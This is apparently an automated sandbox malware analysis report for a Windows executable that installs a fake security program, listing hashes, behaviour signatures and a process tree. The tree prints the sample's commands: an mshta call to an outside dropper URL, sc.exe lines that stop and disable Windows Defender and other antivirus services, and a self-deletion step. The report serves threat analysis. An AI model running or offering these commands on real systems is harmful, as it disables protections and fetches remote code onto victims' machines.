Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    19/06/2024, 20:59

General

  • Target

    0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe

  • Size

    2.0MB

  • MD5

    0077c2fd7e98b372a973640ebdb67bb4

  • SHA1

    687f3783243b3da71d0cb882318224df3406a11c

  • SHA256

    b76b2e9356507b2d1c8157c0f885592d27e8dc9c8d95e6024e041d758d94d5a1

  • SHA512

    5866d2e329e5e7aff9e306af17c9cf7ddf7a4f47eb42f3473470af7ffb57af2c6473c1062f645369f050cb7852017f0d3dfbdabf84064c0508f77a6778d9e9aa

  • SSDEEP

    49152:DLqatPmogbmVZBTN1xC05KRkgc68WJI5NeGu5dkpFpERe8JjVwv14x4Q:DbmHb0f1CRNRJuIGu5mpFpERe8s1i

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.coolsecupdate.info/?0=112&1=8&2=1&3=33&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=hwktraryyo&14=1

Signatures

  • Disables service(s) 3 TTPs
  • UAC bypass 3 TTPs 3 IoCs
  • Disables taskbar notifications via registry modification
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:840
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe" -e -p7lf02436t7m3i73
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1996
      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Users\Admin\AppData\Roaming\Protector-oxby.exe
          C:\Users\Admin\AppData\Roaming\Protector-oxby.exe
          4⤵
          • UAC bypass
          • Event Triggered Execution: Image File Execution Options Injection
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in System32 directory
          • Modifies Internet Explorer settings
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2620
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://galaint.coolsecupdate.info/?0=112&1=8&2=1&3=33&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=hwktraryyo&14=1"
            5⤵
            • Modifies Internet Explorer settings
            PID:2524
          • C:\Windows\SysWOW64\sc.exe
            sc stop WinDefend
            5⤵
            • Launches sc.exe
            PID:1904
          • C:\Windows\SysWOW64\sc.exe
            sc config WinDefend start= disabled
            5⤵
            • Launches sc.exe
            PID:1940
          • C:\Windows\SysWOW64\sc.exe
            sc stop msmpsvc
            5⤵
            • Launches sc.exe
            PID:1908
          • C:\Windows\SysWOW64\sc.exe
            sc config msmpsvc start= disabled
            5⤵
            • Launches sc.exe
            PID:2308
          • C:\Windows\SysWOW64\sc.exe
            sc config ekrn start= disabled
            5⤵
            • Launches sc.exe
            PID:352
          • C:\Windows\SysWOW64\sc.exe
            sc stop AntiVirService
            5⤵
            • Launches sc.exe
            PID:1540
          • C:\Windows\SysWOW64\sc.exe
            sc config AntiVirService start= disabled
            5⤵
            • Launches sc.exe
            PID:1672
          • C:\Windows\SysWOW64\sc.exe
            sc config AntiVirSchedulerService start= disabled
            5⤵
            • Launches sc.exe
            PID:1664
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\L089D0~1.EXE" >> NUL
          4⤵
            PID:2392

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • \Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe

      Filesize

      2.0MB

      MD5

      1a45a0c072a3a8dbd8a3b8d92894e3f8

      SHA1

      1e6db89437e0fd3bcb14c6c9dbe1ce98bb286c20

      SHA256

      43bb6c5aac2f0a5b2597b274c69a0fac1d5d5bd6f62fed8a7b6a203cea3d3325

      SHA512

      689531c4c6091f2124dd4a1750fd4b04fe282d2a61cd51ea5dc936609939f27a3025b0613384bc792c9bd57f64824535fc96ab9eca2e0dd19fb07be13dd16d42

    • \Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe

      Filesize

      1.9MB

      MD5

      b5ff5ef86e7f83fe0ea09efa4b2a13a5

      SHA1

      af3ad93fb39011d8f659fa6f4947664063319f59

      SHA256

      94ef4a33bf5a8f36f70612b010eebc80ef605a4ddc4526d8dd1554c5f3030019

      SHA512

      6dfd92e8a86fe13b0850d02551a98ee2a120087180a9263966f7e14b8a54ffa147cbe90da3fb54848a718ad8ca4b3e98dcf1c60eb8d484fdbc62390c95fef9cc

    • memory/1996-19-0x0000000003880000-0x0000000003C76000-memory.dmp

      Filesize

      4.0MB

    • memory/1996-18-0x0000000003880000-0x0000000003C76000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-63-0x0000000005450000-0x0000000005460000-memory.dmp

      Filesize

      64KB

    • memory/2620-66-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-33-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-77-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-41-0x0000000005450000-0x0000000005460000-memory.dmp

      Filesize

      64KB

    • memory/2620-40-0x0000000005450000-0x0000000005460000-memory.dmp

      Filesize

      64KB

    • memory/2620-58-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-61-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-62-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-76-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-64-0x0000000005450000-0x0000000005460000-memory.dmp

      Filesize

      64KB

    • memory/2620-75-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-67-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-68-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-69-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-70-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-71-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-72-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-73-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2620-74-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2660-32-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2660-20-0x0000000000400000-0x00000000007F6000-memory.dmp

      Filesize

      4.0MB

    • memory/2660-29-0x0000000005430000-0x0000000005826000-memory.dmp

      Filesize

      4.0MB